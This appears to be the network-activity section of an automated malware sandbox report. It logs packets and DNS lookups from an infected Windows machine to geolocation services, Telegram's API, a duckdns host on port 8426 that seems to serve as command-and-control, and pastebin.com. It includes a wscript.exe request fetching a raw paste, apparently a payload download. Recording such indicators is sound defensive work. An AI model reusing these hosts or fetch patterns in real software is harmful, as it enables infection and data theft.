May 22, 2024 02:46:42.574261904 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.574325085 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.575892925 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.575921059 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.575959921 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.575968981 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.576020002 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.578152895 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.578198910 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.578361034 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.578361034 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.578377008 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.578422070 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.663160086 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.663217068 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.663316011 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.663346052 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.663446903 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.664247990 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.664292097 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.664330959 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.664340973 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.664366961 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.664393902 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.665487051 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.665525913 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.665563107 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.665589094 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.665613890 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.665647030 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.666945934 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.667000055 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.667043924 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.667068958 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.667090893 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.667114019 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.668133974 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.668185949 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.668222904 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.668231964 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.668262959 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.668288946 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.669852018 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.669895887 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.669955969 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.669967890 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.670007944 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.670623064 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.670696020 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.670696974 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.670712948 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.670753002 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.671538115 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.671557903 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.671612978 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.671621084 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.671664000 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.757390022 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.757411957 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.757524014 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.757553101 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.757606030 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.758433104 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.758451939 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.758514881 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.758522987 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.758567095 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.759248972 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.759267092 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.759322882 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.759330988 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.759373903 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.759983063 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.760000944 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.760059118 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.760066986 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.760113001 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.761116982 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.761135101 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.761234999 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.761266947 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.761275053 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.761307001 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.761329889 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.762397051 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.762424946 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.762465000 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.762470961 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.762485027 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:42.762510061 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.762537956 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.762773991 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:42.762787104 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:46.931145906 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:46.931210995 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:46.931277990 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:46.947737932 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:46.947809935 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.437710047 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.437804937 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.441652060 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.441667080 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.442028999 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.442082882 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.443597078 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.484127998 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.905659914 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.905728102 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.905754089 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.905791998 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.905797958 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.905827999 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.905869961 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.907442093 CEST	49733	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:47.907459021 CEST	443	49733	104.21.25.148	192.168.2.4
May 22, 2024 02:46:47.979353905 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:47.979445934 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:47.979526043 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:47.979950905 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:47.979990005 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.631118059 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.631211042 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.633078098 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.633096933 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.633433104 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.637733936 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.637877941 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.637909889 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.960114956 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.964701891 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.964768887 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.964840889 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.964876890 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:48.964905977 CEST	49735	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:48.964920998 CEST	443	49735	149.154.167.220	192.168.2.4
May 22, 2024 02:46:49.035322905 CEST	49738	80	192.168.2.4	104.20.3.235
May 22, 2024 02:46:49.099208117 CEST	80	49738	104.20.3.235	192.168.2.4
May 22, 2024 02:46:49.099288940 CEST	49738	80	192.168.2.4	104.20.3.235
May 22, 2024 02:46:49.109447956 CEST	49738	80	192.168.2.4	104.20.3.235
May 22, 2024 02:46:49.159172058 CEST	80	49738	104.20.3.235	192.168.2.4
May 22, 2024 02:46:49.618267059 CEST	80	49738	104.20.3.235	192.168.2.4
May 22, 2024 02:46:49.624622107 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:49.624711037 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:49.624804020 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:49.625082970 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:49.625127077 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:49.659424067 CEST	49738	80	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.112756968 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.112905025 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.115541935 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.115571022 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.115937948 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.124315023 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.168118954 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.703077078 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.703212976 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.703490973 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.705013037 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.705035925 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:50.705066919 CEST	49740	443	192.168.2.4	104.20.3.235
May 22, 2024 02:46:50.705074072 CEST	443	49740	104.20.3.235	192.168.2.4
May 22, 2024 02:46:51.158190012 CEST	49742	80	192.168.2.4	208.95.112.1
May 22, 2024 02:46:51.164526939 CEST	80	49742	208.95.112.1	192.168.2.4
May 22, 2024 02:46:51.164624929 CEST	49742	80	192.168.2.4	208.95.112.1
May 22, 2024 02:46:51.165055037 CEST	49742	80	192.168.2.4	208.95.112.1
May 22, 2024 02:46:51.218367100 CEST	80	49742	208.95.112.1	192.168.2.4
May 22, 2024 02:46:51.652448893 CEST	80	49742	208.95.112.1	192.168.2.4
May 22, 2024 02:46:51.652559996 CEST	49742	80	192.168.2.4	208.95.112.1
May 22, 2024 02:46:51.801291943 CEST	49744	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:46:51.806251049 CEST	8426	49744	40.242.114.161	192.168.2.4
May 22, 2024 02:46:51.806359053 CEST	49744	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:46:51.806516886 CEST	49744	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:46:51.858320951 CEST	8426	49744	40.242.114.161	192.168.2.4
May 22, 2024 02:47:13.218307018 CEST	8426	49744	40.242.114.161	192.168.2.4
May 22, 2024 02:47:13.218564987 CEST	49744	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:13.226788998 CEST	49744	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:13.233117104 CEST	8426	49744	40.242.114.161	192.168.2.4
May 22, 2024 02:47:18.267079115 CEST	49745	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:18.274322033 CEST	8426	49745	40.242.114.161	192.168.2.4
May 22, 2024 02:47:18.274420977 CEST	49745	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:18.274641991 CEST	49745	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:18.326396942 CEST	8426	49745	40.242.114.161	192.168.2.4
May 22, 2024 02:47:23.430659056 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:23.430701971 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:23.430788040 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:23.470282078 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:23.470302105 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:23.945796967 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:23.945908070 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:23.951798916 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:23.951813936 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:23.952024937 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:23.952120066 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:23.953461885 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:24.000113964 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:24.369807005 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:24.369899035 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:24.370042086 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:24.370068073 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:24.371668100 CEST	49746	443	192.168.2.4	104.21.25.148
May 22, 2024 02:47:24.371685982 CEST	443	49746	104.21.25.148	192.168.2.4
May 22, 2024 02:47:24.436352015 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:24.436420918 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:24.436532021 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:24.436892033 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:24.436923981 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.076128960 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.076327085 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.077879906 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.077908039 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.078253984 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.082026958 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.082067013 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.082133055 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.483418941 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.483516932 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.483655930 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.483884096 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.483918905 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.483947039 CEST	49747	443	192.168.2.4	149.154.167.220
May 22, 2024 02:47:25.483962059 CEST	443	49747	149.154.167.220	192.168.2.4
May 22, 2024 02:47:25.534128904 CEST	49748	80	192.168.2.4	104.20.4.235
May 22, 2024 02:47:25.599229097 CEST	80	49748	104.20.4.235	192.168.2.4
May 22, 2024 02:47:25.599411964 CEST	49748	80	192.168.2.4	104.20.4.235
May 22, 2024 02:47:25.599539042 CEST	49748	80	192.168.2.4	104.20.4.235
May 22, 2024 02:47:25.655534983 CEST	80	49748	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.073175907 CEST	80	49748	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.079068899 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.079116106 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.079190969 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.079493999 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.079507113 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.128418922 CEST	49748	80	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.544902086 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.545003891 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.547025919 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.547056913 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.547298908 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.548424006 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.596113920 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.709115028 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.709208012 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.709275961 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.710762024 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.710779905 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:26.710808039 CEST	49749	443	192.168.2.4	104.20.4.235
May 22, 2024 02:47:26.710813999 CEST	443	49749	104.20.4.235	192.168.2.4
May 22, 2024 02:47:30.177241087 CEST	49748	80	192.168.2.4	104.20.4.235
May 22, 2024 02:47:37.980987072 CEST	80	49742	208.95.112.1	192.168.2.4
May 22, 2024 02:47:37.981082916 CEST	49742	80	192.168.2.4	208.95.112.1
May 22, 2024 02:47:39.629184961 CEST	8426	49745	40.242.114.161	192.168.2.4
May 22, 2024 02:47:39.629287958 CEST	49745	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:39.629518032 CEST	49745	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:39.682502031 CEST	8426	49745	40.242.114.161	192.168.2.4
May 22, 2024 02:47:44.669156075 CEST	49751	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:44.674479008 CEST	8426	49751	40.242.114.161	192.168.2.4
May 22, 2024 02:47:44.674587965 CEST	49751	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:44.674705982 CEST	49751	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:47:44.726597071 CEST	8426	49751	40.242.114.161	192.168.2.4
May 22, 2024 02:48:06.088179111 CEST	8426	49751	40.242.114.161	192.168.2.4
May 22, 2024 02:48:06.088355064 CEST	49751	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:06.088404894 CEST	49751	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:06.105088949 CEST	8426	49751	40.242.114.161	192.168.2.4
May 22, 2024 02:48:11.138359070 CEST	49752	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:11.147569895 CEST	8426	49752	40.242.114.161	192.168.2.4
May 22, 2024 02:48:11.147675991 CEST	49752	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:11.147838116 CEST	49752	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:11.200453997 CEST	8426	49752	40.242.114.161	192.168.2.4
May 22, 2024 02:48:32.505105019 CEST	8426	49752	40.242.114.161	192.168.2.4
May 22, 2024 02:48:32.505171061 CEST	49752	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:32.505255938 CEST	49752	8426	192.168.2.4	40.242.114.161
May 22, 2024 02:48:32.557648897 CEST	8426	49752	40.242.114.161	192.168.2.4
May 22, 2024 02:48:36.785211086 CEST	49742	80	192.168.2.4	208.95.112.1
May 22, 2024 02:48:36.849390984 CEST	80	49742	208.95.112.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 02:46:38.047499895 CEST	54760	53	192.168.2.4	1.1.1.1
May 22, 2024 02:46:38.056158066 CEST	53	54760	1.1.1.1	192.168.2.4
May 22, 2024 02:46:39.679183006 CEST	52697	53	192.168.2.4	1.1.1.1
May 22, 2024 02:46:39.686146975 CEST	53	52697	1.1.1.1	192.168.2.4
May 22, 2024 02:46:40.723462105 CEST	51041	53	192.168.2.4	1.1.1.1
May 22, 2024 02:46:40.780879021 CEST	53	51041	1.1.1.1	192.168.2.4
May 22, 2024 02:46:48.971868992 CEST	59034	53	192.168.2.4	1.1.1.1
May 22, 2024 02:46:49.032850027 CEST	53	59034	1.1.1.1	192.168.2.4
May 22, 2024 02:46:51.148808956 CEST	56849	53	192.168.2.4	1.1.1.1
May 22, 2024 02:46:51.157269001 CEST	53	56849	1.1.1.1	192.168.2.4
May 22, 2024 02:46:51.668181896 CEST	61809	53	192.168.2.4	1.1.1.1
May 22, 2024 02:46:51.799990892 CEST	53	61809	1.1.1.1	192.168.2.4
May 22, 2024 02:47:25.491389036 CEST	65175	53	192.168.2.4	1.1.1.1
May 22, 2024 02:47:25.533298016 CEST	53	65175	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 22, 2024 02:46:38.047499895 CEST	192.168.2.4	1.1.1.1	0xab71	Standard query (0)	json.geoiplookup.io	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:39.679183006 CEST	192.168.2.4	1.1.1.1	0x8b2f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:40.723462105 CEST	192.168.2.4	1.1.1.1	0xcc09	Standard query (0)	textjdbimanrminiall.pages.dev	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:48.971868992 CEST	192.168.2.4	1.1.1.1	0xbdea	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:51.148808956 CEST	192.168.2.4	1.1.1.1	0x36d6	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:51.668181896 CEST	192.168.2.4	1.1.1.1	0xdce2	Standard query (0)	masterokrwh.duckdns.org	A (IP address)	IN (0x0001)	false
May 22, 2024 02:47:25.491389036 CEST	192.168.2.4	1.1.1.1	0x61a3	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 22, 2024 02:46:38.056158066 CEST	1.1.1.1	192.168.2.4	0xab71	No error (0)	json.geoiplookup.io	104.21.25.148	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:38.056158066 CEST	1.1.1.1	192.168.2.4	0xab71	No error (0)	json.geoiplookup.io	172.67.134.82	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:39.686146975 CEST	1.1.1.1	192.168.2.4	0x8b2f	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:40.780879021 CEST	1.1.1.1	192.168.2.4	0xcc09	No error (0)	textjdbimanrminiall.pages.dev	172.66.44.176	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:40.780879021 CEST	1.1.1.1	192.168.2.4	0xcc09	No error (0)	textjdbimanrminiall.pages.dev	172.66.47.80	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:49.032850027 CEST	1.1.1.1	192.168.2.4	0xbdea	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:49.032850027 CEST	1.1.1.1	192.168.2.4	0xbdea	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:49.032850027 CEST	1.1.1.1	192.168.2.4	0xbdea	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:51.157269001 CEST	1.1.1.1	192.168.2.4	0x36d6	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
May 22, 2024 02:46:51.799990892 CEST	1.1.1.1	192.168.2.4	0xdce2	No error (0)	masterokrwh.duckdns.org	40.242.114.161	A (IP address)	IN (0x0001)	false
May 22, 2024 02:47:25.533298016 CEST	1.1.1.1	192.168.2.4	0x61a3	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
May 22, 2024 02:47:25.533298016 CEST	1.1.1.1	192.168.2.4	0x61a3	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
May 22, 2024 02:47:25.533298016 CEST	1.1.1.1	192.168.2.4	0x61a3	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

json.geoiplookup.io

api.telegram.org

textjdbimanrminiall.pages.dev

pastebin.com

ip-api.com

masterokrwh.duckdns.org:8426

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	104.20.3.235	80	5660	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 02:46:49.109447956 CEST	182	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
